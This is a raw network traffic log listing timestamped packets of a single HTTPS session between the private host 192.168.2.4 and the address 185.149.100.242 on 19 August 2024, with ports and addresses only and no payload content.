Aug 19, 2024 09:28:41.605473995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.605496883 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.605514050 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.605993986 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.606013060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.606060028 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.606065989 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.606096029 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.606676102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.606694937 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.606728077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.606734991 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.606760979 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.606776953 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.607862949 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.847961903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.847989082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.848051071 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.848073959 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.848090887 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.848117113 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.848133087 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.848153114 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.848383904 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.848398924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.848452091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.848452091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.848459959 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.848609924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.848630905 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.848665953 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.848673105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.848694086 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.849005938 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.849023104 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.849059105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.849071026 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.849082947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.849174976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.849194050 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.849224091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.849230051 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.849245071 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.850007057 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.850027084 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.850080967 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.850092888 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.850101948 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.850121975 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.850146055 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.850152016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.850171089 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.850497007 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.850512028 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.850547075 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.850554943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.850594997 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.850687981 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.850707054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.850763083 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.850770950 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.850987911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.851114035 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.851131916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.851164103 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.851171970 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.851210117 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.851317883 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.851344109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.851366997 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.851373911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.851393938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.851687908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.851702929 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.851739883 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.851748943 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.851757050 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.851771116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.851777077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.851809025 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.851814032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.851845026 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.852344990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.852363110 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.852402925 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.852411032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.852421045 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.852433920 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.852458000 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.852463007 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.852473974 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.852504969 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.852530003 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.853311062 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.853327990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.853391886 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.853413105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.853429079 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.853445053 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.853455067 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.853481054 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.853699923 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.882086039 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.882108927 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.882222891 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.882241011 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.882783890 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.882805109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.882836103 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.882844925 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.882879019 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.883033037 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.883045912 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.883076906 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.883085012 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.883100986 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.883435011 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.883456945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.883485079 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.883491993 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.883502960 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.883749008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.883763075 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.883795023 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.883801937 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.883815050 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.885886908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.885916948 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.885961056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.885968924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.885987043 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.902266026 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.919476986 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.919507027 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.919538021 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.919552088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.919601917 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.920075893 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.920093060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.920125008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.920134068 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.920150042 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.966042995 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.974868059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.974895954 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.974993944 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.975009918 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.975048065 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.975564957 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.975581884 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.975629091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.975639105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.975666046 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.975814104 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.975827932 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.975866079 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.975872040 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.975900888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.975920916 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.976382971 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.976398945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.976433992 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.976440907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.976464033 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.976494074 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.976718903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.976737976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.976779938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.976787090 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.976805925 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.976821899 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.978704929 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.978724957 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.978765011 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.978774071 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.978796959 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.978812933 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.012299061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.012330055 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.012418985 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.012437105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.012475014 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.012794018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.012813091 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.012881041 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.012887955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.012914896 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.012933016 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.071204901 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.071235895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.071348906 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.071373940 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.071408033 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.071413994 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.071427107 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.071448088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.071461916 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.071495056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.071499109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.071527958 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.071594954 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.071609974 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.071646929 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.071657896 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.071688890 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.071705103 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.071974993 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.071991920 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.072045088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.072051048 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.072078943 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.072254896 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.072272062 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.072310925 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.072318077 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.072338104 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.072354078 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.073101044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.073120117 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.073188066 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.073196888 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.073226929 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.104876995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.104902029 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.105011940 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.105041027 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.105087042 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.105107069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.105568886 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.105587959 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.105628967 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.105635881 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.105664015 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.134213924 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.163773060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.163800001 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.163875103 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.163899899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.163924932 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.163944960 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.163949966 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.163963079 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.163980961 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.164000988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.164006948 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.164030075 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.164046049 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.164223909 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.164237976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.164285898 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.164294004 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.164307117 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.164325953 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.164643049 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.164665937 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.164725065 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.164735079 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.164769888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.165074110 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.165090084 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.165133953 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.165143013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.165172100 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.165725946 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.165745020 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.165790081 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.165797949 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.165823936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.201364994 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.201392889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.201432943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.201458931 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.201469898 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.201505899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.201518059 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.201545954 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.208178043 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.216634035 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.256764889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.256793022 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.256874084 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.256906986 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.256907940 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.257044077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.257065058 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.257081032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.257114887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.257128000 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.257139921 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.257158995 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.257164001 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.257177114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.257189989 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.257225990 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.257380962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.257395983 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.257426023 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.257435083 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.257452011 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.257468939 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.257656097 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.257671118 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.257707119 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.257716894 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.257750988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.258301020 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.258671999 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.258692026 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.258722067 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.258728981 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.258744001 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.258757114 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.269654989 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.299196005 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.299217939 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.299257994 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.299273014 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.299284935 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.299285889 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.299329042 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.299330950 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.299346924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.299379110 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.299396038 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.352149963 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.352173090 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.352313995 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.352346897 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.352394104 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.352447987 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.352463961 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.352508068 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.352514982 CEST	443	49759	185.149.100.242	192.168.2.4
